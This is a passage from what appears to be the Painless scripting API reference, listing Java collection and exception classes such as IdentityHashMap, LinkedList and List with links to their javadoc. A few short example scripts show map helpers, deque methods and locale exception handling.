{java11-javadoc}/java.base/java/util/Dictionary.html#elements()[elements]() -* Set {java11-javadoc}/java.base/java/util/Map.html#entrySet()[entrySet]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#equals(java.lang.Object)[equals](Object) -* boolean every(BiPredicate) -* Map.Entry find(BiPredicate) -* Map findAll(BiPredicate) -* def findResult(BiFunction) -* def findResult(def, BiFunction) -* List findResults(BiFunction) -* void {java11-javadoc}/java.base/java/util/Map.html#forEach(java.util.function.BiConsumer)[forEach](BiConsumer) -* def {java11-javadoc}/java.base/java/util/Map.html#get(java.lang.Object)[get](def) -* Object getByPath(null) -* Object getByPath(null, Object) -* def {java11-javadoc}/java.base/java/util/Map.html#getOrDefault(java.lang.Object,java.lang.Object)[getOrDefault](def, def) -* Map groupBy(BiFunction) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#isEmpty()[isEmpty]() -* Set {java11-javadoc}/java.base/java/util/Map.html#keySet()[keySet]() -* Enumeration {java11-javadoc}/java.base/java/util/Dictionary.html#keys()[keys]() -* def {java11-javadoc}/java.base/java/util/Map.html#merge(java.lang.Object,java.lang.Object,java.util.function.BiFunction)[merge](def, def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#put(java.lang.Object,java.lang.Object)[put](def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#putAll(java.util.Map)[putAll](Map) -* def {java11-javadoc}/java.base/java/util/Map.html#putIfAbsent(java.lang.Object,java.lang.Object)[putIfAbsent](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object,java.lang.Object)[remove](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object)[replace](def, def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object,java.lang.Object)[replace](def, def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#replaceAll(java.util.function.BiFunction)[replaceAll](BiFunction) -* int {java11-javadoc}/java.base/java/util/Map.html#size()[size]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Collection 
{java11-javadoc}/java.base/java/util/Map.html#values()[values]() - - -[[painless-api-reference-shared-IdentityHashMap]] -==== IdentityHashMap -* {java11-javadoc}/java.base/java/util/IdentityHashMap.html#()[IdentityHashMap]() -* {java11-javadoc}/java.base/java/util/IdentityHashMap.html#(java.util.Map)[IdentityHashMap](Map) -* void {java11-javadoc}/java.base/java/util/Map.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/IdentityHashMap.html#clone()[clone]() -* List collect(BiFunction) -* def collect(Collection, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#compute(java.lang.Object,java.util.function.BiFunction)[compute](def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfAbsent(java.lang.Object,java.util.function.Function)[computeIfAbsent](def, Function) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfPresent(java.lang.Object,java.util.function.BiFunction)[computeIfPresent](def, BiFunction) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsKey(java.lang.Object)[containsKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsValue(java.lang.Object)[containsValue](def) -* int count(BiPredicate) -* def each(BiConsumer) -* Set {java11-javadoc}/java.base/java/util/Map.html#entrySet()[entrySet]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#equals(java.lang.Object)[equals](Object) -* boolean every(BiPredicate) -* Map.Entry find(BiPredicate) -* Map findAll(BiPredicate) -* def findResult(BiFunction) -* def findResult(def, BiFunction) -* List findResults(BiFunction) -* void {java11-javadoc}/java.base/java/util/Map.html#forEach(java.util.function.BiConsumer)[forEach](BiConsumer) -* def {java11-javadoc}/java.base/java/util/Map.html#get(java.lang.Object)[get](def) -* Object getByPath(null) -* Object getByPath(null, Object) -* def {java11-javadoc}/java.base/java/util/Map.html#getOrDefault(java.lang.Object,java.lang.Object)[getOrDefault](def, def) -* Map groupBy(BiFunction) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#isEmpty()[isEmpty]() -* Set {java11-javadoc}/java.base/java/util/Map.html#keySet()[keySet]() -* def {java11-javadoc}/java.base/java/util/Map.html#merge(java.lang.Object,java.lang.Object,java.util.function.BiFunction)[merge](def, def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#put(java.lang.Object,java.lang.Object)[put](def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#putAll(java.util.Map)[putAll](Map) -* def {java11-javadoc}/java.base/java/util/Map.html#putIfAbsent(java.lang.Object,java.lang.Object)[putIfAbsent](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object,java.lang.Object)[remove](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object)[replace](def, def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object,java.lang.Object)[replace](def, def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#replaceAll(java.util.function.BiFunction)[replaceAll](BiFunction) -* int {java11-javadoc}/java.base/java/util/Map.html#size()[size]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Collection {java11-javadoc}/java.base/java/util/Map.html#values()[values]() - - 
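`Hashtable` and `IdentityHashMap` expose essentially the same `Map` surface shown for `HashMap`, including the unlinked Painless helper methods (`count`, `findAll`, `every`, and friends); the practical difference is that `IdentityHashMap` compares keys by reference identity rather than by `equals`. A minimal sketch with made-up data follows; only methods from the listings above are used.

[source,painless]
----
// Hypothetical prices; count/findAll/every come from the Map listings above.
Map prices = new Hashtable();
prices.put('apple', 3);
prices.put('pear', 5);
prices.put('plum', 5);

int atLeastFive = prices.count((k, v) -> v >= 5);    // 2
Map expensive = prices.findAll((k, v) -> v >= 5);    // the 'pear' and 'plum' entries
boolean allPositive = prices.every((k, v) -> v > 0); // true
----
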
-[[painless-api-reference-shared-IllegalFormatCodePointException]] -==== IllegalFormatCodePointException -* {java11-javadoc}/java.base/java/util/IllegalFormatCodePointException.html#(int)[IllegalFormatCodePointException](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/util/IllegalFormatCodePointException.html#getCodePoint()[getCodePoint]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllegalFormatConversionException]] -==== IllegalFormatConversionException -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* char {java11-javadoc}/java.base/java/util/IllegalFormatConversionException.html#getConversion()[getConversion]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllegalFormatException]] -==== IllegalFormatException -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllegalFormatFlagsException]] -==== IllegalFormatFlagsException -* {java11-javadoc}/java.base/java/util/IllegalFormatFlagsException.html#(java.lang.String)[IllegalFormatFlagsException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/util/IllegalFormatFlagsException.html#getFlags()[getFlags]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllegalFormatPrecisionException]] -==== IllegalFormatPrecisionException -* {java11-javadoc}/java.base/java/util/IllegalFormatPrecisionException.html#(int)[IllegalFormatPrecisionException](int) -* boolean 
{java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* int {java11-javadoc}/java.base/java/util/IllegalFormatPrecisionException.html#getPrecision()[getPrecision]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllegalFormatWidthException]] -==== IllegalFormatWidthException -* {java11-javadoc}/java.base/java/util/IllegalFormatWidthException.html#(int)[IllegalFormatWidthException](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/util/IllegalFormatWidthException.html#getWidth()[getWidth]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllformedLocaleException]] -==== IllformedLocaleException -* {java11-javadoc}/java.base/java/util/IllformedLocaleException.html#()[IllformedLocaleException]() -* {java11-javadoc}/java.base/java/util/IllformedLocaleException.html#(java.lang.String)[IllformedLocaleException](null) -* {java11-javadoc}/java.base/java/util/IllformedLocaleException.html#(java.lang.String,int)[IllformedLocaleException](null, int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/util/IllformedLocaleException.html#getErrorIndex()[getErrorIndex]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-InputMismatchException]] -==== InputMismatchException -* {java11-javadoc}/java.base/java/util/InputMismatchException.html#()[InputMismatchException]() -* {java11-javadoc}/java.base/java/util/InputMismatchException.html#(java.lang.String)[InputMismatchException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - 
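Most of the exception types above surface only the usual `Throwable` accessors, but a few carry extra context, such as `IllformedLocaleException.getErrorIndex()`. A minimal sketch (the tag string is made up) showing how that pairs with the `Locale.Builder` API documented later in this file:

[source,painless]
----
// Hypothetical input; Locale.Builder.setLanguageTag rejects ill-formed
// BCP 47 tags with an IllformedLocaleException.
String tag = 'not a valid tag';
try {
    Locale loc = new Locale.Builder().setLanguageTag(tag).build();
} catch (IllformedLocaleException e) {
    int where = e.getErrorIndex();   // index at which parsing failed
    String why = e.getMessage();
}
----
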
-[[painless-api-reference-shared-IntSummaryStatistics]] -==== IntSummaryStatistics -* {java11-javadoc}/java.base/java/util/IntSummaryStatistics.html#()[IntSummaryStatistics]() -* void {java11-javadoc}/java.base/java/util/function/IntConsumer.html#accept(int)[accept](int) -* IntConsumer {java11-javadoc}/java.base/java/util/function/IntConsumer.html#andThen(java.util.function.IntConsumer)[andThen](IntConsumer) -* void {java11-javadoc}/java.base/java/util/IntSummaryStatistics.html#combine(java.util.IntSummaryStatistics)[combine](IntSummaryStatistics) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* double {java11-javadoc}/java.base/java/util/IntSummaryStatistics.html#getAverage()[getAverage]() -* long {java11-javadoc}/java.base/java/util/IntSummaryStatistics.html#getCount()[getCount]() -* int {java11-javadoc}/java.base/java/util/IntSummaryStatistics.html#getMax()[getMax]() -* int {java11-javadoc}/java.base/java/util/IntSummaryStatistics.html#getMin()[getMin]() -* long {java11-javadoc}/java.base/java/util/IntSummaryStatistics.html#getSum()[getSum]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Iterator]] -==== Iterator -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* void {java11-javadoc}/java.base/java/util/Iterator.html#forEachRemaining(java.util.function.Consumer)[forEachRemaining](Consumer) -* boolean {java11-javadoc}/java.base/java/util/Iterator.html#hasNext()[hasNext]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* def {java11-javadoc}/java.base/java/util/Iterator.html#next()[next]() -* void {java11-javadoc}/java.base/java/util/Iterator.html#remove()[remove]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LinkedHashMap]] -==== LinkedHashMap -* {java11-javadoc}/java.base/java/util/LinkedHashMap.html#()[LinkedHashMap]() -* {java11-javadoc}/java.base/java/util/LinkedHashMap.html#(java.util.Map)[LinkedHashMap](Map) -* void {java11-javadoc}/java.base/java/util/Map.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/HashMap.html#clone()[clone]() -* List collect(BiFunction) -* def collect(Collection, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#compute(java.lang.Object,java.util.function.BiFunction)[compute](def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfAbsent(java.lang.Object,java.util.function.Function)[computeIfAbsent](def, Function) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfPresent(java.lang.Object,java.util.function.BiFunction)[computeIfPresent](def, BiFunction) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsKey(java.lang.Object)[containsKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsValue(java.lang.Object)[containsValue](def) -* int count(BiPredicate) -* def each(BiConsumer) -* Set {java11-javadoc}/java.base/java/util/Map.html#entrySet()[entrySet]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#equals(java.lang.Object)[equals](Object) -* boolean every(BiPredicate) -* Map.Entry find(BiPredicate) -* Map findAll(BiPredicate) -* def findResult(BiFunction) -* def findResult(def, BiFunction) -* List findResults(BiFunction) -* void 
{java11-javadoc}/java.base/java/util/Map.html#forEach(java.util.function.BiConsumer)[forEach](BiConsumer) -* def {java11-javadoc}/java.base/java/util/Map.html#get(java.lang.Object)[get](def) -* Object getByPath(null) -* Object getByPath(null, Object) -* def {java11-javadoc}/java.base/java/util/Map.html#getOrDefault(java.lang.Object,java.lang.Object)[getOrDefault](def, def) -* Map groupBy(BiFunction) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#isEmpty()[isEmpty]() -* Set {java11-javadoc}/java.base/java/util/Map.html#keySet()[keySet]() -* def {java11-javadoc}/java.base/java/util/Map.html#merge(java.lang.Object,java.lang.Object,java.util.function.BiFunction)[merge](def, def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#put(java.lang.Object,java.lang.Object)[put](def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#putAll(java.util.Map)[putAll](Map) -* def {java11-javadoc}/java.base/java/util/Map.html#putIfAbsent(java.lang.Object,java.lang.Object)[putIfAbsent](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object,java.lang.Object)[remove](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object)[replace](def, def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object,java.lang.Object)[replace](def, def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#replaceAll(java.util.function.BiFunction)[replaceAll](BiFunction) -* int {java11-javadoc}/java.base/java/util/Map.html#size()[size]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Collection {java11-javadoc}/java.base/java/util/Map.html#values()[values]() - - -[[painless-api-reference-shared-LinkedHashSet]] -==== LinkedHashSet -* {java11-javadoc}/java.base/java/util/LinkedHashSet.html#()[LinkedHashSet]() -* {java11-javadoc}/java.base/java/util/LinkedHashSet.html#(java.util.Collection)[LinkedHashSet](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/HashSet.html#clone()[clone]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/Set.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/Set.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator 
{java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean {java11-javadoc}/java.base/java/util/Set.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LinkedList]] -==== LinkedList -* {java11-javadoc}/java.base/java/util/LinkedList.html#()[LinkedList]() -* {java11-javadoc}/java.base/java/util/LinkedList.html#(java.util.Collection)[LinkedList](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* void {java11-javadoc}/java.base/java/util/Deque.html#addFirst(java.lang.Object)[addFirst](def) -* void {java11-javadoc}/java.base/java/util/Deque.html#addLast(java.lang.Object)[addLast](def) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/LinkedList.html#clone()[clone]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* Iterator {java11-javadoc}/java.base/java/util/Deque.html#descendingIterator()[descendingIterator]() -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* def {java11-javadoc}/java.base/java/util/Queue.html#element()[element]() -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/List.html#get(int)[get](int) -* Object getByPath(null) -* Object getByPath(null, Object) -* def {java11-javadoc}/java.base/java/util/Deque.html#getFirst()[getFirst]() -* def {java11-javadoc}/java.base/java/util/Deque.html#getLast()[getLast]() -* int getLength() -* Map groupBy(Function) -* int 
{java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* boolean {java11-javadoc}/java.base/java/util/Queue.html#offer(java.lang.Object)[offer](def) -* boolean {java11-javadoc}/java.base/java/util/Deque.html#offerFirst(java.lang.Object)[offerFirst](def) -* boolean {java11-javadoc}/java.base/java/util/Deque.html#offerLast(java.lang.Object)[offerLast](def) -* def {java11-javadoc}/java.base/java/util/Queue.html#peek()[peek]() -* def {java11-javadoc}/java.base/java/util/Deque.html#peekFirst()[peekFirst]() -* def {java11-javadoc}/java.base/java/util/Deque.html#peekLast()[peekLast]() -* def {java11-javadoc}/java.base/java/util/Queue.html#poll()[poll]() -* def {java11-javadoc}/java.base/java/util/Deque.html#pollFirst()[pollFirst]() -* def {java11-javadoc}/java.base/java/util/Deque.html#pollLast()[pollLast]() -* def {java11-javadoc}/java.base/java/util/Deque.html#pop()[pop]() -* void {java11-javadoc}/java.base/java/util/Deque.html#push(java.lang.Object)[push](def) -* def {java11-javadoc}/java.base/java/util/Queue.html#remove()[remove]() -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* def {java11-javadoc}/java.base/java/util/Deque.html#removeFirst()[removeFirst]() -* boolean {java11-javadoc}/java.base/java/util/Deque.html#removeFirstOccurrence(java.lang.Object)[removeFirstOccurrence](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* def {java11-javadoc}/java.base/java/util/Deque.html#removeLast()[removeLast]() -* boolean {java11-javadoc}/java.base/java/util/Deque.html#removeLastOccurrence(java.lang.Object)[removeLastOccurrence](def) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - 
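`LinkedList` is listed with both its `List` methods and its `Deque` methods, so it can serve as a queue or a stack as well as a list. A minimal sketch with made-up event strings, using only methods from the listing above:

[source,painless]
----
// Hypothetical events; addFirst/addLast/peekFirst/pollLast are the
// Deque-style methods from the LinkedList listing.
LinkedList recent = new LinkedList();
recent.addLast('first event');
recent.addLast('second event');
recent.addFirst('urgent event');     // goes to the head of the list

def head = recent.peekFirst();       // 'urgent event' (not removed)
def tail = recent.pollLast();        // 'second event' (removed)
int remaining = recent.size();       // 2
----
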
-[[painless-api-reference-shared-List]] -==== List -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/List.html#get(int)[get](int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] 